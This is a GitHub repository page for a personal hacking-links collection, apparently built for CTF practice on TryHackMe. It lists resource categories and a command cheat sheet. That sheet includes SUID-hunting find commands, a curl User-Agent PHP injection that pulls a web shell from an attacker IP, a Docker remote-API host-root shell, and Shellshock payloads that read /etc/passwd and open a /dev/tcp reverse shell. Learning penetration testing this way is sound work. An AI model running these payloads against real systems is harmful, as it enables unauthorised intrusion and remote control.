项目作者: Dinesh-999

项目描述 :
Hacking links
高级语言:
项目地址: git://github.com/Dinesh-999/Hacking_contents.git
创建时间: 2021-05-12T11:38:34Z
项目社区:https://github.com/Dinesh-999/Hacking_contents

开源协议:

下载


Privilege Escalation Scripts

Privilege Escalation Cheat Sheet

Reverse Shells

Cross Site Script (xss)

Sql Injection Cheat Sheet

Reverse Engineering [Radare, Ghidra, GDB]

Local-File-Inclusion(LFI) Cheat Sheet

Buffer Overflow Writeups

Buffer Overflow Videos:

Payloads Of All The Things and Tools

Encoders, Decoders, Password crackers

Packages or Applications

Phishing and Social Engineering Tools

Vulnerability and CVE’s

Learn Hacking Paths and Sources

Penetration Testing

Blogs:

Write Up’s

WE CAN USE THIS WITHOUT DEPLOYING VM [TRYHACKME]:

Others(misc)

Applications

  1. Stegnography:
  2. 1) Steghide
  3. 2) Exiftool
  4. 3) Binwalk
  5. 4) StegoSuite
  6. 5) Zsteg
  7. 6) Sonic visualizer
  8. 7) Stegoveritas
  9. Directroy Scanner Tool's :
  10. 1) Dirb
  11. 2) GoBuster
  12. 3) Wfuzz
  13. 4) DirBuster

Regex

RSA Algorithm and RSA CTF Solver

Web Security

Exam Report Template

Usage’s

COMMANDS

[find, curl, sed, grep, scp, wfuzz, docker]

FIND COMMAND

  1. find / -user root -perm -4000 -print 2>/dev/null
  2. find / -user root -perm -u=s 2>/dev/null
  3. find / -user archangel 2>/dev/null
  4. find / -perm -u=s -type f 2>/dev/null
  5. find / -type f -newermt "2021-02-15 19:00:00" ! -newermt "2021-02-16 20:00:00" -ls 2>/dev/null
  6. find / -name flag.txt -type f 2>/dev/null
  7. find / -user root -perm -4000 -executable -type f 2>/dev/null

SED

  1. sed -n 148p /home/santa/naughty_list.txt (read only 148th line contents)
  2. sed (use to replace the string with other string or character)

GREP

  1. grep thm{.*} -i *
  2. grep -r mission * .[^.]* 2>/dev/null

OTHERS

  1. curl -A "<?php file_put_contents('shell.php', file_get_contents('http://10.8.94.78:8080/shell.php')); ?>" -s http://10.10.148.69 (send the file to other ip address or upload a file to the webiste using curl)
  2. scp gherkin@10.10.251.122:/home/gherkin/cmd_service.py . (get files from other system through ssh)
  3. docker -H 10.10.171.188:2375 run -v /:/mnt --rm -it frontend chroot /mnt sh (take shell from docker)
  4. git checkout a3d30a7d0510dc6565ff9316e3fb84434916dee8

Shell Shock Vernability

  1. curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.10.155.108//cgi-bin/test.cgi
  2. curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.8.94.78/4242 0>&1' http://10.10.195.105/cgi-bin/test.cgi

Scp commands for download and upload files through ssh

  1. scp index.html alex@10.10.101.79:/home/alex (to put files into other machine)[replace * {in place of index.html} to upload all files in that folder]
  2. scp alex@10.10.101.79:/home/alex . (to download files from other machine)[. means to this floder]